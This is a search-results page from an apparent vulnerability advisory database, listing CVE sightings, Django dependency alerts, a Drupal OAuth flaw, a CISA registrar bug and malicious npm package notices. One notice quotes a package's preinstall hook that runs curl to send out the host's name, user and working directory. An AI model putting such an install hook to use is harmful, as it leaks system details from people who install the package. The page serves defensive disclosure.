205 matches found
Securing the Mission at Machine Speed: Wiz AI Agents Arrive in Wiz for Gov
Wiz AI Agents elevate traditional CNAPP, empowering public sector security teams to accelerate security and innovation...
Malicious code in code-nasa-gov (npm)
--- Credit: OpenSSF source...
CVE-2026-61293
creationtimestamp| type| source ---|---|--- 2026-08-19 17:52:14+00:00| seen| https://www.acn.gov.it/portale/w/critical-patch-update-di-oracle-10 2026-08-29 18:37:06+00:00| seen| https://bsky.app/profile/cyberhub.blog/post/3muajhlchmq2u...
CVE-2026-61222
creationtimestamp| type| source ---|---|--- 2026-08-19 17:19:11+00:00| seen| https://www.acn.gov.it/portale/w/critical-patch-update-di-oracle-10 2026-08-29 04:37:07+00:00| seen| https://bsky.app/profile/cyberhub.blog/post/3mu72jkjxxf2b...
Malicious code in @zalastax/nolb-gov (npm)
The package @zalastax/nolb-gov was found to contain malicious code. --- Credit: OpenSSF source...
caluma (5.6.0), django-covid19 (>=0.3.0a0, <=0.4.0b1) +6 more potentially affected by CVE-2026-15830 via django (2.2.12)
django PYPI version 2.2.12 is affected by a known vulnerability. The following packages have a transitive dependency on django and may be impacted: - caluma 5.6.0 - django-covid19 =0.3.0a0, =0.2.1, =2.2.2, =0.9.7, =0.1.3, =0.30.7 Source cves: CVE-2026-15830 Source advisory: OSV:GHSA-Q238-5CXM-5C9...
CVE-2026-60489
creationtimestamp| type| source ---|---|--- 2026-07-23 17:17:57+00:00| seen| https://www.acn.gov.it/portale/w/critical-patch-update-di-oracle-9...
caluma (5.6.0), django-covid19 (>=0.3.0a0, <=0.4.0b1) +6 more potentially affected by CVE-2026-48588 via django (2.2.12)
django PYPI version 2.2.12 is affected by a known vulnerability. The following packages have a transitive dependency on django and may be impacted: - caluma 5.6.0 - django-covid19 =0.3.0a0, =0.2.1, =2.2.2, =0.9.7, =0.1.3, =0.30.7 Source cves: CVE-2026-48588 Source advisory: OSV:GHSA-3H9F-R86X-QVJ...
DRUPAL-CONTRIB-2026-063
The Salesforce Suite of modules integrates Drupal with Salesforce. The Salesforce module does not properly validate the OAuth handshake during interactive authentication, allowing an attacker to hijack the authorization token and bind the site to an attacker's Salesforce account. This vulnerabili...
Malicious code in nic-datagov (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf package.json declares a preinstall script that runs curl --data-urlencode "info=$hostname && whoami && pwd"...
caluma (5.6.0), django-covid19 (>=0.3.0a0, <=0.4.0b1) +6 more potentially affected by CVE-2026-8404 via django (2.2.12)
django PYPI version 2.2.12 is affected by a known vulnerability. The following packages have a transitive dependency on django and may be impacted: - caluma 5.6.0 - django-covid19 =0.3.0a0, =0.2.1, =2.2.2, =0.9.7, =0.1.3, =0.30.7 Source cves: CVE-2026-8404 Source advisory: OSV:GHSA-8CJM-8MP7-R2XF...
CVE-2026-5297
creationtimestamp| type| source ---|---|--- 2026-05-14 07:52:53+00:00| seen| https://www.acn.gov.it/portale/w/risolte-vulnerabilita-su-gitlab-ce/ee-14 2026-05-14 18:00:00+00:00| seen| https://www.hkcert.org/security-bulletin/gitlab-multiple-vulnerabilities20260515...
CVE-2026-6865
creationtimestamp| type| source ---|---|--- 2026-05-12 04:05:34+00:00| seen| https://www.acn.gov.it/portale/w/vulnerabilita-in-prodotti-schneider-electric-11 2026-06-18 05:00:00+00:00| seen| https://www.cisa.gov/news-events/ics-advisories/icsa-26-169-04 2026-06-18 20:14:18+00:00| seen|...
Malware in @uipath/gov-tool
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outsid...
Malicious code in @uipath/gov-tool (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware f1528428c4478092edf22976f2f4f138666d82e58ca45ef5926c7300e27ca128 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
CVE-2026-43510
manage.get.gov is the .gov TLD registrar maintained by CISA. manage.get.gov allows an organization administrator to assign domain manager privileges for domains not already in another organization. Fixed in 1.176.0 on or around 2026-04-30...
CVE-2026-43510 CISA manage.get.gov insecure portfolio administrative privileges
manage.get.gov is the .gov TLD registrar maintained by CISA. manage.get.gov allows an organization administrator to assign domain manager privileges for domains not already in another organization. Fixed in 1.176.0 on or around 2026-04-30...
PT-2026-31655
Name of the Vulnerable Software and Affected Versions The product name cannot be determined. affected versions not specified Description The rootio-litellm and @rootio/opengov/ppf-backend-types packages have been patched to address an unspecified issue. Recommendations At the moment, there is no...
CVE-2026-22902
creationtimestamp| type| source ---|---|--- 2026-03-23 10:37:14+00:00| seen| https://www.acn.gov.it/portale/w/vulnerabilita-in-prodotti-qnap-7 2026-03-23 14:40:08+00:00| seen| https://bsky.app/profile/o2cloud.bsky.social/post/3mhqc3gk4px2k...
caluma (5.6.0), django-covid19 (>=0.3.0a0, <=0.4.0b1) +6 more potentially affected by CVE-2025-64459 via django (2.2.12)
django PYPI version 2.2.12 is affected by a known vulnerability. The following packages have a transitive dependency on django and may be impacted: - caluma 5.6.0 - django-covid19 =0.3.0a0, =0.2.1, =2.2.2, =0.9.7, =0.1.3, =0.30.7 Source cves: CVE-2025-64459 Source advisory: OSV:GHSA-FRMV-PR5F-9MC...